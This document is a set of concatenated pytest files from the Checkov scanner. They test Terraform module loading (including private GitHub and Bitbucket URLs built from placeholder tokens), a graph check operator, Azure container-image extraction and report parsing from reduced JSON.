    ids=["module", "module_with_version", "inner_module", "inner_module_with_version"],
)
@mock.patch("checkov.terraform.module_loading.loaders.git_loader.GitGetter", autospec=True)
def test_load_bitbucket(
    git_getter,
    tmp_path: Path,
    source,
    expected_content_path,
    expected_git_url,
    expected_dest_dir,
    expected_module_source,
    expected_inner_module,
):
    # given
    current_dir = tmp_path / "bitbucket"
    registry = ModuleLoaderRegistry(download_external_modules=True)
    registry.module_content_cache = {}

    # when
    content = registry.load(current_dir=str(current_dir), source=source, source_version="latest")

    # then
    assert content.loaded()
    assert content.path() == str(Path(DEFAULT_EXTERNAL_MODULES_DIR) / expected_content_path)

    git_getter.assert_called_once_with(expected_git_url, mock.ANY)


@pytest.mark.parametrize(
    "source, expected_content_path, expected_exception",
    [
        ("./loaders/resources", "loaders/resources", does_not_raise()),
        ("../module_loading/loaders/resources", "loaders/resources", does_not_raise()),
        ("./does_not_exist", "", pytest.raises(FileNotFoundError)),
    ],
    ids=["current_dir", "parent_dir", "not_exists"],
)
@mock.patch("checkov.terraform.module_loading.loaders.git_loader.GitGetter", autospec=True)
def test_load_local_path(git_getter, tmp_path: Path, source, expected_content_path, expected_exception):
    # given
    current_dir = Path(__file__).parent
    registry = ModuleLoaderRegistry()
    registry.module_content_cache = {}

    # when
    with expected_exception:
        content = registry.load(current_dir=str(current_dir), source=source, source_version="latest")

        # then
        assert content.loaded()
        assert content.path() == str(current_dir / expected_content_path)

        git_getter.assert_not_called()


@pytest.mark.parametrize(
    "source, expected_content_path, expected_git_url, expected_dest_dir, expected_module_source, expected_inner_module",
    [
        (
            "github.com/kartikp10/terraform-aws-s3-bucket1",
            "github.com/kartikp10/terraform-aws-s3-bucket1/HEAD",
            "https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-s3-bucket1",
            "github.com/kartikp10/terraform-aws-s3-bucket1/HEAD",
            "git::https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-s3-bucket1",
            "",
        ),
       ( 
            "git::https://github.com/kartikp10/terraform-aws-s3-bucket1.git",
            "github.com/kartikp10/terraform-aws-s3-bucket1/HEAD",
            "https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-s3-bucket1.git",
            "github.com/kartikp10/terraform-aws-s3-bucket1/HEAD",
            "git::https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-s3-bucket1.git",
            "",
        ),
       ( 
           "git@github.com:kartikp10/terraform-aws-s3-bucket1.git",
            "github.com/kartikp10/terraform-aws-s3-bucket1/HEAD",
            "https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-s3-bucket1.git",
            "github.com/kartikp10/terraform-aws-s3-bucket1/HEAD",
            "git::https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-s3-bucket1.git",
            "",
        ),
       ( 
           "git::ssh://git@github.com/kartikp10/terraform-aws-s3-bucket1.git",
            "github.com/kartikp10/terraform-aws-s3-bucket1/HEAD",
            "https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-s3-bucket1.git",
            "github.com/kartikp10/terraform-aws-s3-bucket1/HEAD",
            "git::https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-s3-bucket1.git",
            "",
        ),
        (
            "github.com/kartikp10/terraform-aws-security-group//modules/http-80",
            "github.com/kartikp10/terraform-aws-security-group/HEAD/modules/http-80",
            "https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-security-group",
            "github.com/kartikp10/terraform-aws-security-group/HEAD",
            "git::https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-security-group",
            "modules/http-80",
        ),
        (
            "git::ssh://git@github.com/kartikp10/terraform-aws-s3-bucket1.git?ref=v1.2.0",
            "github.com/kartikp10/terraform-aws-s3-bucket1/v1.2.0",
            "https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-s3-bucket1.git?ref=v1.2.0",
            "github.com/kartikp10/terraform-aws-s3-bucket1/v1.2.0",
            "git::https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-s3-bucket1.git?ref=v1.2.0",
            "",
        ),
       ( 
           "git@github.com:kartikp10/terraform-aws-security-group.git//modules/http-80",
            "github.com/kartikp10/terraform-aws-security-group/HEAD",
            "https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-security-group",
            "github.com/kartikp10/terraform-aws-security-group/HEAD",
            "git::https://x-access-token:ghp_xxxxxxxxxxxxxxxxx@github.com/kartikp10/terraform-aws-security-group",
            "modules/http-80",
        )
    ],
    ids=["github_http_module", "generic_git_module", "ssh_github_module", "generic_ssh_module","github_http_module", "generic_ssh_module_version", "github_ssh_module_version"],
)
@mock.patch.dict(os.environ, {"GITHUB_PAT": "ghp_xxxxxxxxxxxxxxxxx"})
@mock.patch("checkov.terraform.module_loading.loaders.git_loader.GitGetter", autospec=True)
def test_load_github_private(
    git_getter,
    tmp_path: Path,
    source,
    expected_content_path,
    expected_git_url,
    expected_dest_dir,
    expected_module_source,
    expected_inner_module,
):
    git_getter.side_effect = [Exception(), None]
    # given
    current_dir = tmp_path / "github_private"
    registry = ModuleLoaderRegistry(download_external_modules=True)
    registry.module_content_cache = {}

    # when
    registry.loaders = [GithubAccessTokenLoader()]
    registry.load(current_dir=str(current_dir), source=source, source_version="latest")

    # then
    git_getter.assert_called_with(expected_git_url, create_clone_and_result_dirs=False)


@pytest.mark.parametrize(
    "source, expected_content_path, expected_git_url, expected_dest_dir, expected_module_source, expected_inner_module",
    [
        (
            "bitbucket.org/kartikp10/terraform-aws-s3-bucket1",
            "bitbucket.org/kartikp10/terraform-aws-s3-bucket1/HEAD",
            "https://x-token-auth:xxxxxxxxxxxxxxxxx@bitbucket.org/kartikp10/terraform-aws-s3-bucket1",
            "bitbucket.org/kartikp10/terraform-aws-s3-bucket1/HEAD",
            "git::https://x-token-auth:xxxxxxxxxxxxxxxxx@bitbucket.org/kartikp10/terraform-aws-s3-bucket1",
            "",
        )
    ],
    ids=["module"],
)
@mock.patch.dict(os.environ, {"BITBUCKET_TOKEN": "xxxxxxxxxxxxxxxxx"})
@mock.patch("checkov.terraform.module_loading.loaders.git_loader.GitGetter", autospec=True)
def test_load_bitbucket_private(
    git_getter,
    tmp_path: Path,
    source,
    expected_content_path,
    expected_git_url,
    expected_dest_dir,
    expected_module_source,
    expected_inner_module,
):
    git_getter.side_effect = [Exception(), None]
    # given
    current_dir = tmp_path / "bitbucket_private"
    registry = ModuleLoaderRegistry(download_external_modules=True)
    registry.module_content_cache = {}

    # when
    registry.loaders = [BitbucketAccessTokenLoader()]
    registry.load(current_dir=str(current_dir), source=source, source_version="latest")

    # then
    git_getter.assert_called_with(expected_git_url, create_clone_and_result_dirs=False)


def test_load_terraform_registry_with_real_download(tmp_path: Path):
    # given
    current_dir = str(tmp_path / "tf_download")
    registry = ModuleLoaderRegistry(download_external_modules=True, external_modules_folder_name=DEFAULT_EXTERNAL_MODULES_DIR)
    registry.module_content_cache = {}
    registry.root_dir = current_dir

    source = "terraform-aws-modules/security-group/aws"

    # when
    content = registry.load(current_dir=current_dir, source=source, source_version="~> 3.0")

    expected_content_path = os.path.join(
        current_dir,
        DEFAULT_EXTERNAL_MODULES_DIR,
        "github.com/terraform-aws-modules/terraform-aws-security-group",
    )

    assert content.loaded()
    assert content.path().startswith(f"{expected_content_path}/v3.")


def test_load_terraform_registry_check_cache(tmp_path: Path):
    # given
    current_dir = str(tmp_path / "cache_check")
    registry = ModuleLoaderRegistry(download_external_modules=True)
    registry.module_content_cache = {}
    registry.root_dir = current_dir

    source1 = "git::https://github.com/bridgecrewio/checkov_not_working1.git"
    source2 = "git::https://github.com/bridgecrewio/checkov_not_working2.git"

    # when
    registry.load(current_dir=current_dir, source=source1, source_version="latest")

    assert source1 in registry.failed_urls_cache

    registry.load(current_dir=current_dir, source=source2, source_version="latest")

    # then
    assert source1 in registry.failed_urls_cache
    assert source2 in registry.failed_urls_cache



import os

from parameterized import parameterized_class

from tests.terraform.graph.checks_infra.test_base import TestBaseSolver

TEST_DIRNAME = os.path.dirname(os.path.realpath(__file__))


@parameterized_class([
   {"graph_framework": "NETWORKX"},
   {"graph_framework": "IGRAPH"}
])
class TestNumberOfWordsEquals(TestBaseSolver):
    def setUp(self):
        self.checks_dir = TEST_DIRNAME
        super(TestNumberOfWordsEquals, self).setUp()

    def test_number_of_words_not_equals(self):
        # this is just a basic check to make sure the operator works
        # we'll check all the other combinations more directly (because coming up with all the policy combos is painful)
        root_folder = '../../../resources/number_of_words'
        check_id = "NumberOfWordsNotEquals"
        should_pass = ['aws_security_group.sg2']
        should_fail = ['aws_security_group.sg1']
        expected_results = {check_id: {"should_pass": should_pass, "should_fail": should_fail}}

        self.run_test(root_folder=root_folder, expected_results=expected_results, check_id=check_id)



import os

from unittest import mock

import igraph
import pytest
from networkx import DiGraph

from checkov.common.graph.graph_builder import CustomAttributes
from checkov.common.images.image_referencer import Image
from checkov.terraform.image_referencer.provider.azure import AzureTerraformProvider


@pytest.mark.parametrize("graph_framework", ['NETWORKX', 'IGRAPH'])
def extract_images_from_resources(graph_framework):
    # given
    resource = {
            "file_path_": "/batch.bicep",
            "__end_line__": 26,
            "__start_line__": 1,
            "properties": {
                "virtualMachineConfiguration": {
                    "containerConfiguration": {
                        "containerImageNames": ["nginx", "python:3.9-alpine"],
                        "containerRegistries": {
                            "password": "myPassword",
                            "registryServer": "myContainerRegistry.azurecr.io",
                            "username": "myUserName",
                        },
                        "type": "DockerCompatible",
                    },
                }
            },
            "resource_type": "Microsoft.Batch/batchAccounts/pools",
        }
    if graph_framework == 'IGRAPH':
        graph = igraph.Graph()
        graph.add_vertex(
            name='1',
            block_type_='resource',
            resource_type=resource[
                CustomAttributes.RESOURCE_TYPE] if CustomAttributes.RESOURCE_TYPE in resource else None,
            attr=resource,
        )
    else:
        graph = DiGraph()
        graph.add_node(1, **resource)

    # when
    azure_provider = AzureTerraformProvider(graph_connector=graph)
    images = azure_provider.extract_images_from_resources()

    # then
    assert images == [
        Image(file_path="/batch.bicep", name="nginx", start_line=1, end_line=26),
        Image(file_path="/batch.bicep", name="python:3.9-alpine", start_line=1, end_line=26),
    ]


@pytest.mark.parametrize('graph_framework', ["NETWORKX", "IGRAPH"])
def test_extract_images_from_resources_with_no_image(graph_framework):
    # given
    resource = {
        "file_path_": "/batch.bicep",
        "__end_line__": 26,
        "__start_line__": 1,
        "properties": {
            "virtualMachineConfiguration": {
                "containerConfiguration": {
                    "containerImageNames": [],
                    "containerRegistries": {
                        "password": "myPassword",
                        "registryServer": "myContainerRegistry.azurecr.io",
                        "username": "myUserName",
                    },
                    "type": "DockerCompatible",
                },
            }
        },
        "resource_type": "Microsoft.Batch/batchAccounts/pools",
    }
    if graph_framework == 'IGRAPH':
        graph = igraph.Graph()
        graph.add_vertex(
            name='1',
            block_type_='resource',
            resource_type=resource[
                CustomAttributes.RESOURCE_TYPE] if CustomAttributes.RESOURCE_TYPE in resource else None,
            attr=resource,
        )
    else:
        graph = DiGraph()
        graph.add_node(1, **resource)

    # when
    with mock.patch.dict('os.environ', {'CHECKOV_GRAPH_FRAMEWORK': graph_framework}):
        azure_provider = AzureTerraformProvider(graph_connector=graph)
        images = azure_provider.extract_images_from_resources()

    # then
    assert not images



from checkov.common.output.report import Report


def test_from_reduced_json(json_reduced_report):
    # Act
    report = Report.from_reduced_json(json_reduced_report, 'mock_check_type')

    # Assert
    assert len(report.failed_checks) == 1
    assert len(report.passed_checks) == 1

    failed_check = report.failed_checks[0]
    passed_check = report.passed_checks[0]

    assert failed_check.check_id == 'CKV_GHA_2'
    assert failed_check.check_name == 'Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn\u0027t true on environment variables'
    assert failed_check.check_result == {
        "result": "FAILED",
        "results_configuration": {}
    }
    assert failed_check.resource == 'jobs(container-test-job)'
    assert failed_check.file_path == '/.github/workflows/image_no_violation.yml'
    assert failed_check.file_line_range == [7, 7]
    assert failed_check.file_abs_path == '/tmp/checkov/elturgeman6/elturgeman/supplygoat1/main/src/.github/workflows/image_no_violation.yml'
    assert failed_check.code_block == [
        [
            7,
            "    runs-on: ubuntu-latest\n"
        ],
    ]
    assert failed_check.bc_check_id == 'BC_REPO_GITHUB_ACTION_1'

    assert passed_check.check_id == 'CKV_GHA_1'
    assert passed_check.check_name == 'Ensure ACTIONS_ALLOW_UNSECURE_COMMANDS isn\u0027t true on environment variables'
    assert passed_check.check_result == {
        "result": "PASSED",
        "results_configuration": {}
    }
    assert passed_check.resource == 'jobs(container-test-job)'
    assert passed_check.file_path == '/.github/workflows/image_no_violation.yml'
    assert passed_check.file_line_range == [7, 7]
    assert passed_check.file_abs_path == '/tmp/checkov/elturgeman6/elturgeman/supplygoat1/main/src/.github/workflows/image_no_violation.yml'
    assert passed_check.code_block == [
        [
            7,
            "    runs-on: ubuntu-latest\n"
        ],
    ]
    assert passed_check.bc_check_id == 'BC_REPO_GITHUB_ACTION_1'